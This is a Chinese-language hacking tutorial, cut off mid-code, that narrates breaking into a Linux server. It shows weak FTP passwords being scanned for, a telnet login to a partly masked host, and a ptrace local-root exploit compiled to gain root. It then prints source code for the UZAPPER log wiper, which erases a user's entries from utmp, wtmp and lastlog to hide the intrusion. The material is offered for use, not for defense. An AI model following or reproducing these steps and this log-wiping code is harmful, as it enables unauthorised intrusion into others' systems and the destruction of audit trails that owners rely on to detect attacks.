最好的入侵linux教程(1)(2)

B：本地溢出

本地溢出需要一个具有Shell权限的帐号，这个帐号可以通过pop3或ftp弱密码得到，照样举个例子：

流光扫描...一会儿得到了一个ftp帐号(webmaster，webmaster)，先telnet上去!

telnet *.174.62.135

Red Hat Linux release 6.2 (Cartman) ----->>linux 6.2,容易搞定!

Kernel 2.2.12-20kr2smp on an i686

login: webmaster

Password:

Last login: Wed Apr 24 02:21:58 from *.*.*.*

You have mail. ----->>这家伙有新邮件，不过我没兴趣!

[webmaster@ns webmaster]$ ----->>气人的普通用户$

[webmaster@ns webmaster]$cat >ts.c

... ----->>要学会利用网络资源，自己找，当是练习!

[webmaster@ns webmaster]$gcc -o ts ts.c ----->>还是用gcc编译。

In file included from /usr/include/asm/user.h:5,

from /usr/include/linux/user.h:1,

from ts.c:30:

/usr/include/linux/ptrace.h:22: warning: `PTRACE_SYSCALL' redefined

/usr/include/sys/ptrace.h:103: warning: this is the location of the previous def

inition

[webmaster@ns webmaster]$ ls

Desktop/ Mail/ ts* ts.c

[webmaster@ns webmaster]$ ./ts

attached

bash# su root

[root@ns webmaster]# ----->>搞定，看见#我就高兴!

[root@ns webmaster]# cat >wipe.c ----->>扫脚印的，这个还是给大家吧，否则有人要扁我了!

/*=============================================================================

UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD

The Shadow Penguin Security ( http://shadowpenguin.backsection.net )

Written by UNYUN ( unewn4th@usa.net )

=============================================================================

*/

#include

#include

#include

#include

#ifdef UTMAXTYPE

#define UTMPX

#include

#endif

#include

#ifndef _PATH_LASTLOG

#include

#endif

#include

#include

#include

#define SVR4_UTMP "/var/adm/utmp"

#define SVR4_WTMP "/var/adm/wtmp"

#define SVR4_LASTLOG "/var/adm/lastlog"

#define SUNOS4_UTMP "/etc/utmp"

#define SUNOS4_WTMP "/usr/adm/wtmp"

#define SUNOS4_LASTLOG "/usr/adm/lastlog"

#define BSD_UTMP "/var/run/utmp"

#define BSD_WTMP "/var/log/wtmp"

#define BSD_LASTLOG "/var/log/lastlog"

#define MAX_FPATH 512

int wipe_log(path,user,type)

char *path,*user;

int type;

{

struct utmp utmp_ent;

#ifdef UTMPX

struct utmpx utmpx_ent;

#endif

void *ent;

char *un;

int sz,fd,c=0;

if (strlen(path)==0) return(1);

if (type==0){

ent=(void *)&utmp_ent;

#ifdef UTMPX

un=(char *)&utmp_ent.ut_user;

#else

un=(char *)&utmp_ent.ut_name;

#endif

sz=sizeof(struct utmp);

}else{

#ifdef UTMPX

ent=(void *)&utmpx_ent;

un=(char *)&utmpx_ent.ut_user;

sz=sizeof(struct utmpx);

#endif

}

if ((fd=open(path,O_RDWR))<=0) return(-1);

while(read(fd,ent,sz)>0)

if (!strncmp(un,user,strlen(user))){

memset(ent,0,sz);

lseek(fd,-sz,SEEK_CUR);

write(fd,ent,sz);

c++;

}

close(fd);

printf("Wiped %d entries of %s from %s.\n",c,user,path);

return(0);

}

int wipe_lastlog(path,user,type)

char *path,*user;

int type;

{

struct passwd *p;

struct lastlog ent;

int fd;

char buffer[MAX_FPATH];